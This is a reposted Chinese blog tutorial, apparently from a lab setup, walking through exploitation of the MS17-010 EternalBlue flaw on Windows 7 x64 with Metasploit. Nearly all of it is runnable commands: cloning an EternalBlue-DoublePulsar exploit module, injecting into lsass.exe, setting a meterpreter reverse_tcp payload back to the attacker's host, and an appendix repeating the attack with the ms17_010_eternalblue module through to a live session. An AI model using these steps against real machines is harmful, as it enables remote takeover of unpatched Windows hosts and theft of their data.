zoukankan      html  css  js  c++  java
  • 永恒之蓝msf下 ms17_010 (64位kali下安装wine32)

    本次用到的环境:

    kali(2016.2)32位系统.ip地址:192.168.1.104

    目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

    =================================

    若kali为64位

    windows为32

    需要安装wine32 ,但64位的kali下无法apt-get install wine32

    在执行exploit时会出现 :

    it looks like wine32 is missing, you should install it.
    multiarch needs to be enabled first. as root, please
    execute "dpkg --add-architecture i386 && apt-get update &&
    apt-get install wine32"

    按照上面的方法dpkg --add-architecture i386 && apt-get update &&
    apt-get install wine32即可

    =================================

    具体的步骤如下:

    kali系统下安装wine32:

    apt-get install wine32 

     

    用wine32执行cmd.exe

    wine cmd.exe

     

    exit        //退出

     

     git  clone下载其利用脚本:

    git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

    然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

    cd    Eternalblue-Doublepulsar-Metasploit/
    cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

     

    启动msf,然后进行一系列设置:

    service postgresql start
    msfconsole

     

    search  eternalblue
    use exploit/windows/smb/eternalblue_doublepulsar

    复制代码
     set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
    
      set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
    
    set PROCESSINJECT   lsass.exe
    
    set TARGETARCHITECTURE  x64
    
    set rhost  192.168.1.105
    
    show targets
    
    set target 9
    
    set payload windows/x64/meterpreter/reverse_tcp
    
    show options
    
    set lhost 192.168.1.104
    
    exploit
    复制代码

     

     

    附录:

    msf下的ms17-010模块:

    前提条件:

    1. gem install ruby_smb #ruby_smb模块安装

    2.msfupdate   #msf的更新

    3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #启动并加载模块

    复制代码
    root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb
    
    root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb
    
    Use exploit/windows/smb/ms17_010_eternalblue
    
    msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
    
    msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21
    
    msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
    
    msf exploit(ms17_010_eternalblue) >exploit
    
    Meterpreter> sysinfo
    复制代码

     

     转载:https://www.cnblogs.com/backlion/p/6804863.html

  • 相关阅读:
    传输速率转换
    CentOS7 安装 oracleXE(快捷版)教程
    QEMU/KVM虚拟机安装配置
    Nginx 1.10.1 编译、配置文档(支持http_v2,TLSv1.2,openssl v1.0.2)
    IDC机房线路质量测试方案
    Iptables防火墙NAT地址转换与端口转发
    Zabbix使用点滴
    MySQL基本命令
    防DDOS攻击SHELL脚本
    12月份的英文简写
  • 原文地址:https://www.cnblogs.com/jjj-fly/p/8145587.html
Copyright © 2011-2022 走看看